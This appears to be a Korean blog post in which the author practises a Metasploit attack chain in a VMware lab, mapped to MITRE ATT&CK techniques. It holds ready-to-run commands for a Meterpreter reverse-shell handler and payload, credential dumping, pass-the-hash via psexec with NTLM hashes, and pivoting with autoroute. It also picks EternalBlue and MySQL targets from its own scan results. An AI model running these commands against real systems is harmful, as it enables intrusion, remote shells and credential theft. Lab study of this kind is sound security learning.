์ผ๋‹จ ํ•˜๊ณ  ๋ณด๋Š” ์‚ฌ๋žŒ

๋‚˜์ค‘๋ณด๋‹จ ์ง€๊ธˆ์— ์ง‘์ค‘ํ•˜๋˜, ์ง€๊ธˆ๋ณด๋‹จ ๋‚˜์ค‘์— ์™„๋ฒฝํ•ด์ง€์ž๐Ÿ’ช๐Ÿป

๐Ÿง Linux ์•Œ๊ณ  ์“ฐ์ž

[Metasploit] ๊ณต๊ฒฉ list

JanginTech 2024. 10. 18. 10:59

0. ์„ธ์…˜์—ฐ๊ฒฐ

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.86.130
set LPORT 4444

exploit

 

1. Exploit ์ทจ์•ฝ์  ๊ณต๊ฒฉ (T1203: Exploitation for Client Execution)

  • ๋ชฉ์ : ํด๋ผ์ด์–ธํŠธ ์ธก ์†Œํ”„ํŠธ์›จ์–ด๋‚˜ ์‹œ์Šคํ…œ์˜ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ ์•…์„ฑ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰.
  • ๊ณผ์ •:

[๊ณผ์ •]

1.

set RHOST <ํƒ€๊ฒŸ IP ์ฃผ์†Œ>

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST <๊ณต๊ฒฉ์ž IP ์ฃผ์†Œ>

set LPORT <๊ณต๊ฒฉ์ž ํฌํŠธ>

 

set RHOSTS 192.168.86.134

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.86.130
set LPORT 4444

exploit

 

2. T1003: Credential Dumping (ํฌ๋ฆฌ๋ด์…œ ๋คํ”„)

  • ๋ชฉ์ :  ํƒ€๊ฒŸ ์‹œ์Šคํ…œ์˜ ์‚ฌ์šฉ์ž ๊ณ„์ • ํฌ๋ฆฌ๋ด์…œ์„ ๋คํ”„ํ•˜์—ฌ ํ•ด์‹œ๋‚˜ ํŒจ์Šค์›Œ๋“œ๋ฅผ ์ถ”์ถœ
  • ๋‹จ๊ณ„: ํ™œ์„ฑํ™”๋œ Meterperter ์„ธ์…˜์„ ํ†ตํ•ด ์‚ฌ์šฉ์ž ๊ณ„์ •์˜ ํŒจ์Šค์›Œ๋“œ ํ•ด์‹œ ๊ฐ’์„ ๋คํ”„ํ•œ๋‹ค. ๋คํ”„๋œ ํ•ด์‹œ ๊ฐ’์„ ์‚ฌ์šฉํ•˜์—ฌ Pass the Hash์™€ ๊ฐ™์€ ํ›„์† ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•  ์ˆ˜ ์žˆ์–ด ์œ ์šฉํ•˜๋‹ค.

 

 

3. Pass the Hash ๊ณต๊ฒฉ (T1075: Pass the Hash)

  • ๋ชฉ์ : ํ•ด์‹œ๋œ ํฌ๋ฆฌ๋ด์…œ์„ ์‚ฌ์šฉํ•˜์—ฌ ์ธ์ฆ์„ ์šฐํšŒ.(๋คํ”„ ํ›„์† ๊ณต๊ฒฉ)
  • ๋‹จ๊ณ„: ํƒ€๊ฒŸ ์‹œ์Šคํ…œ์—์„œ ํ•ด์‹œ๋ฅผ ๋คํ”„ํ•œ ํ›„, ํ•ด๋‹น ํ•ด์‹œ๋ฅผ ์ด์šฉํ•˜์—ฌ ๋‹ค๋ฅธ ์‹œ์Šคํ…œ์— ์ ‘๊ทผ

use exploit/windows/smb/psexec

set SMBUser <์‚ฌ์šฉ์ž๋ช…>

set SMBPass <ํ•ด์‹œ ๊ฐ’>

set RHOST <ํƒ€๊ฒŸ IP>

exploit

 

use exploit/windows/smb/psexec

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

set RHOSTS 192.168.86.134

exploit

 

set SMBUser honge

set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0

set RHOSTS 192.168.86.134

exploit

 

set SMBUser jjh

set SMBPass aad3b435b51404eeaad3b435b51404ee:5c897c5cae4fea0eabdaf0cb41fc1dd9

set RHOSTS 192.168.86.134

exploit

 

SMB ์ด์Šˆ๋กœ ์ด๊ฑด ๋ณด๋ฅ˜!^^

 

 

 

T1059: Command and Scripting Interpreter (๋ช…๋ น ๋ฐ ์Šคํฌ๋ฆฝํŒ… ์ธํ„ฐํ”„๋ฆฌํ„ฐ)

  • ๋ชฉ์ : ํƒ€๊ฒŸ ์‹œ์Šคํ…œ์—์„œ ๋ช…๋ น์„ ์‹คํ–‰ํ•˜๊ฑฐ๋‚˜ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰
  • ๋‹จ๊ณ„:
    1. shell ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํƒ€๊ฒŸ ์‹œ์Šคํ…œ์—์„œ ์ปค๋งจ๋“œ ํ”„๋กฌํ”„ํŠธ์— ์ง์ ‘ ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๋‹ค

 

 

 

 

 

 

๋„คํŠธ์›Œํฌ ํƒ์ƒ‰ ๋ฐ ๊ณต๊ฒฉ ๊ธฐ๋ฒ•

1. ๋„คํŠธ์›Œํฌ ์„ค์ • ํ™•์ธ (T1016: System Network Configuration Discovery)

  • ๋ชฉ์ : ํƒ€๊ฒŸ ์‹œ์Šคํ…œ์˜ ๋„คํŠธ์›Œํฌ ์„ค์ •์„ ํ™•์ธํ•˜์—ฌ, ํƒ€๊ฒŸ์ด ์†ํ•œ ๋„คํŠธ์›Œํฌ์˜ ๊ตฌ์กฐ์™€ IP ๋ฒ”์œ„๋ฅผ ํŒŒ์•…
  • ๋‹จ๊ณ„:
    1. Meterpreter ์„ธ์…˜์—์„œ ๋‹ค์Œ ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•ด ๋„คํŠธ์›Œํฌ ์„ค์ •์„ ํ™•์ธ

ํƒ€๊ฒŸ ์‹œ์Šคํ…œ์˜ IP ์ฃผ์†Œ, ์„œ๋ธŒ๋„ท, ๊ฒŒ์ดํŠธ์›จ์ด ๋“ฑ ๋„คํŠธ์›Œํฌ ์„ค์ • ์ •๋ณด๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ

 

2. ๋„คํŠธ์›Œํฌ ํ˜ธ์ŠคํŠธ ํƒ์ƒ‰ (T1046: Network Service Scanning)

  • ๋ชฉ์ : ๋„คํŠธ์›Œํฌ ๋‚ด ๋‹ค๋ฅธ ํ˜ธ์ŠคํŠธ๋ฅผ ์ฐพ๊ณ , ํ•ด๋‹น ํ˜ธ์ŠคํŠธ์—์„œ ์‹คํ–‰ ์ค‘์ธ ์„œ๋น„์Šค๋ฅผ ์‹๋ณ„ํ•˜์—ฌ ๊ณต๊ฒฉ ๊ฐ€๋Šฅํ•œ ๋Œ€์ƒ์ด ์žˆ๋Š”์ง€ ํ™•์ธ

ํƒ€๊ฒŸ ๋„คํŠธ์›Œํฌ ๋‚ด์—์„œ ๋‹ค๋ฅธ ํ˜ธ์ŠคํŠธ๋กœ ์ด๋™ํ•  ์ˆ˜ ์žˆ๋„๋ก ๋ผ์šฐํŒ…์„ ์„ค์ •

  1. Meterpreter์—์„œ run post/multi/manage/autoroute ๋ช…๋ น์–ด๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํƒ€๊ฒŸ ๋„คํŠธ์›Œํฌ ๋‚ด์—์„œ ๋‹ค๋ฅธ ํ˜ธ์ŠคํŠธ๋กœ ์ด๋™ํ•  ์ˆ˜ ์žˆ๋„๋ก ๋ผ์šฐํŒ… ์„ค์ •

ํ˜„์žฌ autoroute ๋ชจ๋“ˆ์„ ์‚ฌ์šฉํ•˜์—ฌ ํƒ€๊ฒŸ ์‹œ์Šคํ…œ์˜ ์„œ๋ธŒ๋„ท์— ๋Œ€ํ•œ ๋ผ์šฐํŠธ๋ฅผ ์„ฑ๊ณต์ ์œผ๋กœ ์ถ”๊ฐ€ํ•œ ์ƒํƒœ๋‹ค.

์ด๋กœ ์ธํ•ด, ํƒ€๊ฒŸ ์‹œ์Šคํ…œ์ด ์†ํ•œ 192.168.86.0/24 ์„œ๋ธŒ๋„ท๊ณผ Bluetooth ๋„คํŠธ์›Œํฌ์ธ 169.254.0.0/16 ์„œ๋ธŒ๋„ท์— ๋Œ€ํ•œ ๊ฒฝ๋กœ๊ฐ€ ์„ค์ •๋˜์—ˆ๋‹ค

 

 

2. Nmap์„ ์‚ฌ์šฉํ•˜์—ฌ ๋„คํŠธ์›Œํฌ ์ƒ์˜ ๋‹ค๋ฅธ ํ˜ธ์ŠคํŠธ๋ฅผ ์Šค์บ”ํ•  ์ˆ˜ ์žˆ๋‹ค.

Meterpreter ๋‚ด์—์„œ Nmap ์Šค์บ”์„ ์‹คํ–‰ํ•˜๋ ค๋ฉด, Meterpreter ์„ธ์…˜์„ ์œ ์ง€ํ•œ ์ƒํƒœ์—์„œ ๊ณต๊ฒฉ์ž ์‹œ์Šคํ…œ์˜ ํ„ฐ๋ฏธ๋„์—์„œ ์‹คํ–‰ํ•ด์•ผ ํ•œ๋‹ค.

์„ค์ •๋œ ๋ผ์šฐํŠธ์— ๋”ฐ๋ผ ๋„คํŠธ์›Œํฌ ์ƒ์˜ ๋‹ค๋ฅธ ํ˜ธ์ŠคํŠธ๋ฅผ ํƒ์ƒ‰ํ•˜๊ณ , ์—ด๋ ค ์žˆ๋Š” ํฌํŠธ๋ฅผ ์Šค์บ”ํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋œ๋‹ค!!

 

์„œ๋ธŒ๋„ท ์Šค์บ”ํ•ด์•ผ ๋จ

ํ˜„์žฌ 192.168.86.0/24 ๋„คํŠธ์›Œํฌ ๋Œ€์—ญ์—์„œ 5๊ฐœ์˜ ํ˜ธ์ŠคํŠธ๊ฐ€ ๋ฐœ๊ฒฌ๋˜์—ˆ์œผ๋ฉฐ, ๊ฐ ํ˜ธ์ŠคํŠธ์—์„œ ์—ด๋ฆฐ ํฌํŠธ์™€ ์‹คํ–‰ ์ค‘์ธ ์„œ๋น„์Šค๊ฐ€ ๋‚˜์™€ ์žˆ๋‹ค.

Nmap ์Šค์บ” ๊ฒฐ๊ณผ ํ•ด์„:

  1. 192.168.86.1
    • ์ƒํƒœ: ํ˜ธ์ŠคํŠธ ํ™œ์„ฑํ™” (Host is up)
    • ์—ด๋ฆฐ ํฌํŠธ:
      • 3306/tcp open mysql: ์ด ํ˜ธ์ŠคํŠธ์—์„œ๋Š” MySQL ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ์„œ๋น„์Šค๊ฐ€ ์‹คํ–‰ ์ค‘
    • MAC ์ฃผ์†Œ: 00:50:56:6C:00:08 (VMware ๊ฐ€์ƒ ๋จธ์‹ )
  2. 192.168.86.2
    • ์ƒํƒœ: ํ˜ธ์ŠคํŠธ ํ™œ์„ฑํ™”
    • ์—ด๋ฆฐ ํฌํŠธ:
      • 53/tcp open domain: ์ด ํฌํŠธ๋Š” DNS(Domain Name System) ์„œ๋น„์Šค๊ฐ€ ์‹คํ–‰ ์ค‘
    • MAC ์ฃผ์†Œ: 00:50:56:F4:2F:71 (VMware ๊ฐ€์ƒ ๋จธ์‹ )
  3. 192.168.86.134
    • ์ƒํƒœ: ํ˜ธ์ŠคํŠธ ํ™œ์„ฑํ™”
    • ์—ด๋ฆฐ ํฌํŠธ:
      • 135/tcp open msrpc: Microsoft RPC(Remote Procedure Call) ์„œ๋น„์Šค๊ฐ€ ์—ด๋ ค ์žˆ์Œ
      • 139/tcp open netbios-ssn: NetBIOS ์„ธ์…˜ ์„œ๋น„์Šค ์‹คํ–‰ ์ค‘
      • 445/tcp open microsoft-ds: SMB(Server Message Block) ์„œ๋น„์Šค๋„ ์—ด๋ ค์žˆ์Œ. SMB๋Š” ํŒŒ์ผ ๊ณต์œ , ํ”„๋ฆฐํ„ฐ ๊ณต์œ  ๋“ฑ์— ์‚ฌ์šฉ๋˜๋ฉฐ, ์—ฌ๋Ÿฌ ์ทจ์•ฝ์ (CVE-2017-0144 EternalBlue ๋“ฑ)๊ณผ ์—ฐ๊ฒฐ๋˜์–ด ์žˆ์Œ
      • 49152/tcp ~ 49160/tcp open unknown: ์ด ํฌํŠธ๋“ค์€ ์ผ๋ฐ˜์ ์œผ๋กœ Windows์—์„œ ๋™์ ์œผ๋กœ ํ• ๋‹น๋œ RPC ๊ด€๋ จ ํฌํŠธ์ผ ๊ฐ€๋Šฅ์„ฑ์ด ๋†’๋‹ค๊ณ  ํ•จ
    • MAC ์ฃผ์†Œ: 00:0C:29:8B:AE:81 (VMware ๊ฐ€์ƒ ๋จธ์‹ )
  4. 192.168.86.254
    • ์ƒํƒœ: ํ˜ธ์ŠคํŠธ ํ™œ์„ฑํ™”
    • ๋ชจ๋“  ํฌํŠธ๊ฐ€ ์‘๋‹ตํ•˜์ง€ ์•Š์Œ(ignored ์ƒํƒœ)
    • MAC ์ฃผ์†Œ: 00:50:56:6C:AB(VMware ๊ฐ€์ƒ ๋จธ์‹ )
  5. 192.168.86.130
    • ์ƒํƒœ: ํ˜ธ์ŠคํŠธ ํ™œ์„ฑํ™”
    • ์—ด๋ฆฐ ํฌํŠธ:
      • 80/tcp open http: HTTP ์„œ๋น„์Šค๊ฐ€ ์—ด๋ ค ์žˆ์œผ๋ฏ€๋กœ ์›น ์„œ๋ฒ„๊ฐ€ ์‹คํ–‰ ์ค‘์ผ ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ๋‹ค
    • MAC ์ฃผ์†Œ: (ํ‘œ๊ธฐ๋˜์ง€ ์•Š์Œ)

 

์ฃผ์š” ๊ณต๊ฒฉ ๋Œ€์ƒ:

  • 192.168.86.134:
    • ์ด ์‹œ์Šคํ…œ์€ ์—ฌ๋Ÿฌ ํฌํŠธ๊ฐ€ ์—ด๋ ค ์žˆ๊ณ , ํŠนํžˆ SMB(445) ํฌํŠธ์™€ MSRPC(135) ํฌํŠธ๊ฐ€ ์—ด๋ ค์žˆ์Œ
    • EternalBlue(CVE-2017-0144)์™€ ๊ฐ™์€ SMB ์ทจ์•ฝ์ ์„ ์•…์šฉํ•  ์ˆ˜ ์žˆ๋Š” ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ์œผ๋ฉฐ, RPC ํฌํŠธ๋„ ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ ์ทจ์•ฝ์ ์ด ์กด์žฌํ•  ์ˆ˜ ์žˆ์Œ
  • 192.168.86.1:
    • MySQL ์„œ๋น„์Šค๊ฐ€ ์‹คํ–‰ ์ค‘์ธ ๊ฒƒ์œผ๋กœ ๋ณด์•„ MySQL์—์„œ ๊ธฐ๋ณธ์ ์œผ๋กœ ์ทจ์•ฝํ•œ ์„ค์ •์ด ์žˆ๊ฑฐ๋‚˜ ์•ฝํ•œ ๋น„๋ฐ€๋ฒˆํ˜ธ๋กœ ์„ค์ •๋œ ๊ฒฝ์šฐ, SQL Injection ๋˜๋Š” ๋น„๋ฐ€๋ฒˆํ˜ธ ํฌ๋ž™์„ ์‹œ๋„ํ•  ์ˆ˜ ์žˆ๋‹ค(์ด๊ฑด ๋‹ค์Œ ๊ธฐํšŒ์—..ใ…Žใ…Ž)
  • 192.168.86.130:
    • HTTP(80) ํฌํŠธ๊ฐ€ ์—ด๋ ค ์žˆ์œผ๋ฏ€๋กœ ์›น ์„œ๋ฒ„์— ๋Œ€ํ•ด ์ทจ์•ฝ์  ์Šค์บ”์„ ์‹œ๋„ํ•  ์ˆ˜ ์žˆ๊ณ  ํŠนํžˆ, ์›น ์„œ๋ฒ„๊ฐ€ ๊ตฌ๋ฒ„์ „์ธ ๊ฒฝ์šฐ ์—ฌ๋Ÿฌ ์ทจ์•ฝ์ ์ด ์žˆ์„ ์ˆ˜ ์žˆ๋‹ค.